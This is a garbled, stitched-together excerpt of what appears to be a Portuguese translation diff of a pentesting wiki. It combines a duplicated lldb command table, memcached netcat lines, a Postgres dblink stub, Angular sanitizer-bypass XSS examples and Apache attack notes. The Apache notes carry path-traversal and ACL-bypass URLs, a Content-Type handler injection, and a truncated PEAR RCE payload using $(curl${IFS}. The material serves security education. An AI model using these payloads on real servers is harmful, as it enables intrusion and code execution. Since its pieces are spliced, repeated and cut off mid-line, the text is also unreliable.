.png)
| (lldb) Comando | Descrição |
| run (r) | Inicia a execução, que continuará sem interrupções até que um ponto de interrupção seja atingido ou o processo termine. |
| process launch --stop-at-entry | Inicia a execução parando no ponto de entrada |
| continue (c) | Continua a execução do processo depurado. |
| nexti (n / ni) | Executa a próxima instrução. Este comando irá pular chamadas de função. |
| stepi (s / si) | Executa a próxima instrução. Ao contrário do comando nexti, este comando irá entrar nas chamadas de função. |
| finish (f) | Executa o restante das instruções na função atual (“frame”), retorna e para. |
| control + c | Pausa a execução. Se o processo foi executado (r) ou continuado (c), isso fará com que o processo pare ...onde quer que esteja executando atualmente. |
| breakpoint (b) |
breakpoint delete <num> |
| help | help breakpoint #Obter ajuda do comando breakpoint help memory write #Obter ajuda para escrever na memória |
| reg | reg read reg read $rax reg read $rax --format <formato> reg write $rip 0x100035cc0 |
| x/s <reg/endereço de memória> | Exibe a memória como uma string terminada em nulo. |
| x/i <reg/endereço de memória> | Exibe a memória como instrução de assembly. |
| x/b <reg/endereço de memória> | Exibe a memória como byte. |
| print object (po) | Isso imprimirá o objeto referenciado pelo parâmetro po $raw
Note que a maioria das APIs ou métodos Objective-C da Apple retornam objetos, e, portanto, devem ser exibidos via o comando “print object” (po). Se po não produzir uma saída significativa, use |
| memory | memory read 0x000.... memory read $x0+0xf2a memory write 0x100600000 -s 4 0x41414141 #Escreve AAAA nesse endereço memory write -f s $rip+0x11f+7 "AAAA" #Escreve AAAA no addr |
| disassembly | dis #Desmonta a função atual dis -n <funcname> #Desmonta a função dis -n <funcname> -b <basename> #Desmonta a função |
| parray | parray 3 (char **)$x1 # Verifica array de 3 componentes no reg x1 |
| image dump sections | Imprime o mapa da memória do processo atual |
| image dump symtab <library> | image dump symtab CoreNLP #Obtém o endereço de todos os símbolos do CoreNLP |
| (lldb) Comando | Descrição |
| run (r) | Inicia a execução, que continuará sem interrupções até que um ponto de interrupção seja atingido ou o processo termine. |
| process launch --stop-at-entry | Inicia a execução parando no ponto de entrada |
| continue (c) | Continua a execução do processo depurado. |
| nexti (n / ni) | Executa a próxima instrução. Este comando irá pular chamadas de função. |
| stepi (s / si) | Executa a próxima instrução. Ao contrário do comando nexti, este comando irá entrar nas chamadas de função. |
| finish (f) | Executa o restante das instruções na função atual (“frame”) e retorna, parando. |
| control + c | Pausa a execução. Se o processo foi executado (r) ou continuado (c), isso fará com que o processo pare ...onde quer que esteja executando atualmente. |
| breakpoint (b) |
breakpoint delete <num> |
| help | help breakpoint #Obter ajuda do comando breakpoint help memory write #Obter ajuda para escrever na memória |
| reg | reg read reg read $rax reg read $rax --format <formato> reg write $rip 0x100035cc0 |
| x/s <reg/endereço de memória> | Exibe a memória como uma string terminada em nulo. |
| x/i <reg/endereço de memória> | Exibe a memória como instrução de assembly. |
| x/b <reg/endereço de memória> | Exibe a memória como byte. |
| print object (po) | Isso imprimirá o objeto referenciado pelo parâmetro po $raw
Note que a maioria das APIs ou métodos Objective-C da Apple retornam objetos, e, portanto, devem ser exibidos via o comando “print object” (po). Se po não produzir uma saída significativa, use |
| memory | memory read 0x000.... memory read $x0+0xf2a memory write 0x100600000 -s 4 0x41414141 #Escreve AAAA nesse endereço memory write -f s $rip+0x11f+7 "AAAA" #Escreve AAAA no addr |
| disassembly | dis #Desmonta a função atual dis -n <funcname> #Desmonta a função dis -n <funcname> -b <basename> #Desmonta a função |
| parray | parray 3 (char **)$x1 # Verifica array de 3 componentes no reg x1 |
| image dump sections | Imprime o mapa da memória do processo atual |
| image dump symtab <library> | image dump symtab CoreNLP #Obtém o endereço de todos os símbolos do CoreNLP |
.png)
.png)
.png)
set mykey <flags> <ttl> <size>
<p>Certifique-se de usar \r\n como quebras de linha ao usar ferramentas CLI do Unix. Por exemplo</p> printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211
set mykey <flags> <ttl> <size>
<p>Certifique-se de usar \r\n como quebras de linha ao usar ferramentas CLI do Unix. Por exemplo</p> printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211
.png)
CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
@@ -666,7 +664,7 @@ PERFORM dblink_disconnect();
…
```
-3. `bypassSecurityTrustHtml` é usado para indicar que o valor fornecido é HTML seguro. Observe que inserir elementos `script` na árvore DOM dessa maneira não fará com que eles executem o código JavaScript contido, devido à forma como esses elementos são adicionados à árvore DOM.
+3. `bypassSecurityTrustHtml` é usado para indicar que o valor fornecido é HTML seguro. Observe que a inserção de elementos `script` na árvore DOM dessa maneira não fará com que eles executem o código JavaScript contido, devido à forma como esses elementos são adicionados à árvore DOM.
```jsx
//app.component.ts
@@ -174,7 +174,7 @@ this.trustedScript = this.sanitizer.bypassSecurityTrustScript("alert('bypass Sec
//resultado
-
```
-5. `bypassSecurityTrustStyle` é usado para indicar que o valor fornecido é CSS seguro. O seguinte exemplo ilustra a injeção de CSS:
+5. `bypassSecurityTrustStyle` é usado para indicar que o valor fornecido é CSS seguro. O exemplo a seguir ilustra a injeção de CSS:
```jsx
//app.component.ts
@@ -446,7 +446,7 @@ $palias.append(html);
#### Interfaces DOM
-De acordo com a documentação do W3C, os objetos `window.location` e `document.location` são tratados como aliases em navegadores modernos. É por isso que eles têm implementações semelhantes de alguns métodos e propriedades, o que pode causar um redirecionamento aberto e XSS DOM com ataques de esquema `javascript://`, conforme mencionado abaixo.
+De acordo com a documentação do W3C, os objetos `window.location` e `document.location` são tratados como aliases em navegadores modernos. É por isso que eles têm implementação semelhante de alguns métodos e propriedades, o que pode causar um redirecionamento aberto e XSS DOM com ataques de esquema `javascript://`, conforme mencionado abaixo.
* `window.location.href`(e `document.location.href`)
diff --git a/src/network-services-pentesting/pentesting-web/apache.md b/src/network-services-pentesting/pentesting-web/apache.md
index 1bd764861..d8381118f 100644
--- a/src/network-services-pentesting/pentesting-web/apache.md
+++ b/src/network-services-pentesting/pentesting-web/apache.md
@@ -46,7 +46,7 @@ curl http://server/user/orange
curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml`
```
-- **Atribuição Enganosa do RewriteFlag**
+- **Atribuição de RewriteFlag Enganosa**
Na seguinte regra de reescrita, desde que a URL termine em .php, ela será tratada e executada como php. Portanto, é possível enviar uma URL que termina em .php após o caractere `?` enquanto carrega no caminho um tipo diferente de arquivo (como uma imagem) com código php malicioso dentro dele:
```bash
@@ -72,14 +72,14 @@ AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user
```
-Isso ocorre porque, por padrão, o PHP-FPM receberá URLs que terminam em `.php`, como `http://server/admin.php%3Fooo.php` e porque o PHP-FPM removerá qualquer coisa após o caractere `?`, a URL anterior permitirá carregar `/admin.php`, mesmo que a regra anterior a proíba.
+Isso ocorre porque, por padrão, o PHP-FPM receberá URLs que terminam em `.php`, como `http://server/admin.php%3Fooo.php` e, como o PHP-FPM removerá qualquer coisa após o caractere `?`, a URL anterior permitirá carregar `/admin.php`, mesmo que a regra anterior a proíba.
### Confusão do DocumentRoot
```bash
DocumentRoot /var/www/html
RewriteRule ^/html/(.*)$ /$1.html
```
-Um fato interessante sobre o Apache é que a reescrita anterior tentará acessar o arquivo tanto do documentRoot quanto da raiz. Assim, uma solicitação para `https://server/abouth.html` verificará o arquivo em `/var/www/html/about.html` e `/about.html` no sistema de arquivos. O que basicamente pode ser explorado para acessar arquivos no sistema de arquivos.
+Um fato interessante sobre o Apache é que a reescrita anterior tentará acessar o arquivo tanto do documentRoot quanto da raiz. Assim, uma solicitação para `https://server/abouth.html` verificará o arquivo em `/var/www/html/about.html` e `/about.html` no sistema de arquivos. Isso pode ser basicamente explorado para acessar arquivos no sistema de arquivos.
#### **Divulgação de Código Fonte do Lado do Servidor**
@@ -162,7 +162,7 @@ Além disso, abusando de symlinks foi possível obter **RCE no Redmine.**
### Confusão de Manipuladores
-Este ataque explora a sobreposição de funcionalidade entre as diretivas `AddHandler` e `AddType`, que ambas podem ser usadas para **habilitar o processamento PHP**. Originalmente, essas diretivas afetavam campos diferentes (`r->handler` e `r->content_type`, respectivamente) na estrutura interna do servidor. No entanto, devido a código legado, o Apache trata essas diretivas de forma intercambiável sob certas condições, convertendo `r->content_type` em `r->handler` se o primeiro estiver definido e o último não.
+Este ataque explora a sobreposição de funcionalidade entre as diretivas `AddHandler` e `AddType`, que podem ser usadas para **habilitar o processamento PHP**. Originalmente, essas diretivas afetavam campos diferentes (`r->handler` e `r->content_type`, respectivamente) na estrutura interna do servidor. No entanto, devido a código legado, o Apache trata essas diretivas de forma intercambiável sob certas condições, convertendo `r->content_type` em `r->handler` se o primeiro estiver definido e o último não.
Além disso, no Apache HTTP Server (`server/config.c#L420`), se `r->handler` estiver vazio antes de executar `ap_run_handler()`, o servidor **usa `r->content_type` como o manipulador**, efetivamente tornando `AddType` e `AddHandler` idênticos em efeito.
@@ -177,7 +177,7 @@ TODO: Orange ainda não divulgou essa vulnerabilidade
### **Invocar Manipuladores Arbitrários**
-Se um atacante conseguir controlar o cabeçalho **`Content-Type`** em uma resposta do servidor, ele poderá **invocar manipuladores de módulo arbitrários**. No entanto, no ponto em que o atacante controla isso, a maior parte do processo da solicitação já terá sido concluída. No entanto, é possível **reiniciar o processo da solicitação abusando do cabeçalho `Location`** porque se o **Status** retornado for 200 e o cabeçalho `Location` começar com uma `/`, a resposta é tratada como uma Redireção do Lado do Servidor e deve ser processada.
+Se um atacante conseguir controlar o cabeçalho **`Content-Type`** em uma resposta do servidor, ele poderá **invocar manipuladores de módulo arbitrários**. No entanto, no ponto em que o atacante controla isso, a maior parte do processo da solicitação já terá sido concluída. No entanto, é possível **reiniciar o processo da solicitação abusando do cabeçalho `Location`** porque se o `Status` retornado for 200 e o cabeçalho `Location` começar com uma `/`, a resposta é tratada como uma Redireção do Lado do Servidor e deve ser processada.
De acordo com [RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875) (especificação sobre CGI) na [Seção 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) define um comportamento de Resposta de Redirecionamento Local:
@@ -228,7 +228,7 @@ Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0
```
#### **Manipulador Arbitrário para RCE**
-A imagem oficial [PHP Docker](https://hub.docker.com/_/php) inclui PEAR (`Pearcmd.php`), uma ferramenta de gerenciamento de pacotes PHP via linha de comando, que pode ser explorada para obter RCE:
+A imagem oficial [PHP Docker](https://hub.docker.com/_/php) inclui o PEAR (`Pearcmd.php`), uma ferramenta de gerenciamento de pacotes PHP via linha de comando, que pode ser explorada para obter RCE:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}
diff --git a/src/network-services-pentesting/pentesting-web/bolt-cms.md b/src/network-services-pentesting/pentesting-web/bolt-cms.md
index 042dc430f..030844f37 100644
--- a/src/network-services-pentesting/pentesting-web/bolt-cms.md
+++ b/src/network-services-pentesting/pentesting-web/bolt-cms.md
@@ -12,7 +12,7 @@ Após fazer login como admin (vá para /bot para acessar o prompt de login), voc
.png)
.png)
 (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1).png)